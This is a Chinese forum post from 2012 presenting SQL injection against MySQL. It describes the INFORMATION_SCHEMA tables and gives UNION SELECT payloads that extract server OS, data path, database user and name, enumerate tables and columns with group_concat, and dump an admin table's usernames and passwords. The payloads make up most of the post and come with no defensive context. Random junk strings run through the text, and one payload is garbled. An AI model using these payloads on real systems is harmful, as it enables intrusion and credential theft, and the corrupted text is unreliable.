本文介绍MYSQL盲注的一些语句和方法
# L% Y( r8 W5 q( Y
$ W0 l* `3 L% o8 E) [; B学习盲注前先了解下 IFORMATION_SCHEMA 库
' m. @' _- S. L3 g$ | V1 L3 e2 t' { d
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
: v0 U( J1 x8 }3 `' z# Y存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
; `3 m7 [2 @9 i6 ^5 [1.得到所有数据库名:) t: `8 _3 L6 x" e- _
|SCHEMATA ->存储数据库名的表
2 F- `7 Q8 t4 A& o, {& @' p$ g|---字段:SCHEMA_NAME ->数据库名称
- G7 s% S6 m" G9 Y9 b; p& Q8 b" e5 T# x, p
|TABLES ->存储表名
1 }( J7 `! V, }|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
& b% |8 D9 U' |, r# X- C8 g, B|---字段:TABLE_NAME ->存储表的表名% b% G+ Y% \! l r: ?! C- Y
' q! E2 u! b. F|COLUMNS ->存储的字段名表
( s% E) ^$ M' J5 I|---字段:TABLE_SCHEMA ->该字段所属数据库名; D9 ]' c2 M# C2 F) x
|---字段:TABLE_NAME ->存储所属表的名称
2 o; U+ ^& F& C" I* {' J T6 N# c9 ~1 E: ^. r3 K, w" w
|---字段:COLUMN_NAME ->该字段的名称
3 \* t9 y2 M0 g
1 L8 Q& r$ A6 @- B
9 s, ], r6 K2 P! V7 C L" D( ? C f% [" b
###########################################################################, r/ Z" i0 X) z' B: x, X. e# [- E8 D2 Y
, M. m& H) O. ?& Q8 l0x001 获取系统信息:
) M% i2 X& W. j" H% o1 k* G* z
9 X- U8 l; ]" d, qunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*5 [+ x# E8 R& o' E: y1 Q
/ g/ t$ N$ E, ^7 j8 t$ j0 y3 |
/*# c5 R& k+ q2 l a4 |/ n
7 M9 p2 o$ y! j% f
@@global.version_compile_os 获取系统版本* n/ A. x& Y7 U+ D0 g# ^
0 u8 L- L( x; I1 K8 L& b) Y@@datadir 数据库路径
7 I8 j- Q5 ~, z3 J: `database() 当前数据库名称0 [% ]0 f/ x( j- s+ @
0x3c62723e 换行HEX值
/ Z H% ~! C; A4 H. T% ]' ?$ D! M' K" D& h( M$ Y5 P
*/
( k7 B" t( x2 n
/ q7 @3 h5 q# u0 L* Y" [+ ?
0 p9 W1 Z4 [8 Y" S0 `9 a' h2 I1 [5 j3 ^3 O( C$ J- a {- y% G, S0 W/ u4 b
######################################################################& q7 c4 j ?* S3 O
' q& Q! i0 q8 [5 I0x002 获取表名
. [ f! Q: i( t2 a9 Y. W' h
. O$ k/ y: s9 ^4 Eunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
9 [: ~: N( w6 K5 w; v+ ?( Q7 x p5 D) I% C# A# K
) G: j' R: e* {/ s
4 X$ [- _ {- b/*, t6 |+ W" ^' s" r
6 @& M- j6 |2 @, P2 ]- _0x67617264656e 为当前数据库名3 j* }% ]5 }; L; i7 u" K6 ~3 m
# J) T0 e( e5 L1 i- k! @) U5 U0 P2 s
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
& i" z/ L$ e, u; M1 U
& _- ] E. Y$ ^8 Q0 v4 W*/9 t5 ]: ^# I9 E& j0 j9 g! U# r( K a0 |
2 ?' r6 U; t5 `# M9 m! \% K# r
######################################################################
. S2 ?3 B# ^8 { r0 O
% W& C1 k/ P6 D7 q M $ O$ i: Q' r$ C5 f
1 t7 ~9 B: V# \% s0x003 获取字段
' V1 |1 V6 ~2 o0 V6 R5 O% X3 n( y3 y' |! i- Q' f2 M/ Q* m- I! P
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*1 D7 _# p$ z7 f6 k! ?' b
) z! ~% R/ p: T
/*: [" u, F7 T& D$ |" Q% v1 p S. C
3 K t4 p9 E* l# s
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
# W3 x. @1 s& h. e7 z$ J; w1 ]
1 y' t2 A2 U9 x1 ?2 U9 u2 O0x61646d696e ->选择一个表; v2 W% P& e9 ?. O' o" V2 ?9 T. H% k; {
9 p* X2 s! R. t0 ^0 E5 s( g/ ]
0x67617264656e ->数据库名5 e C1 K6 [0 i8 |
, A$ m" a* U9 _8 A. B*/
: Q* s2 Y5 F9 t- g, N" M9 S8 u3 U3 I$ `* [: W; U
#####################################################################
, I9 [4 v2 I d+ W; W; ^) M r
0 G$ b5 A" I6 t1 g1 |+ y6 w" H
& ^ n$ @ h" j0 D
% }! C! U* T5 \( Y5 K0x004 获取数据& k- m( V+ L* B0 _
! b: U" y, b* c$ r1 F) ]3 Uunion select 1,2,39 ~' g: X v; V( b
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin2 G1 B3 x2 k+ O d( Z
+ G: W6 q% ]% L; Y" r' [8 \
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
n; v6 F, z8 i1 L4 Z. f6 p8 x$ h7 h: ~( C
R) B. y+ t' q# w! P- }- `* T/ N
7 v; s5 T8 k0 j H/*( L9 \- {2 A. @9 _+ ?
4 T( b+ d6 s; Y* u, J6 a: G0x3c62723e 换行符号HEX编码
, f1 w C; d2 T) P
( _# v/ E, u5 C" T/ ~group_concat 同时获得该字段所有数据6 X( p5 h6 f8 R1 g/ k2 y* m
+ J: l! {2 x) j/ J5 Q*/ P% N$ [$ Y! F# q
b0 m$ `$ P, o5 S" o% M
|
发表于 2012-9-13 17:48:44
收藏
支持
反对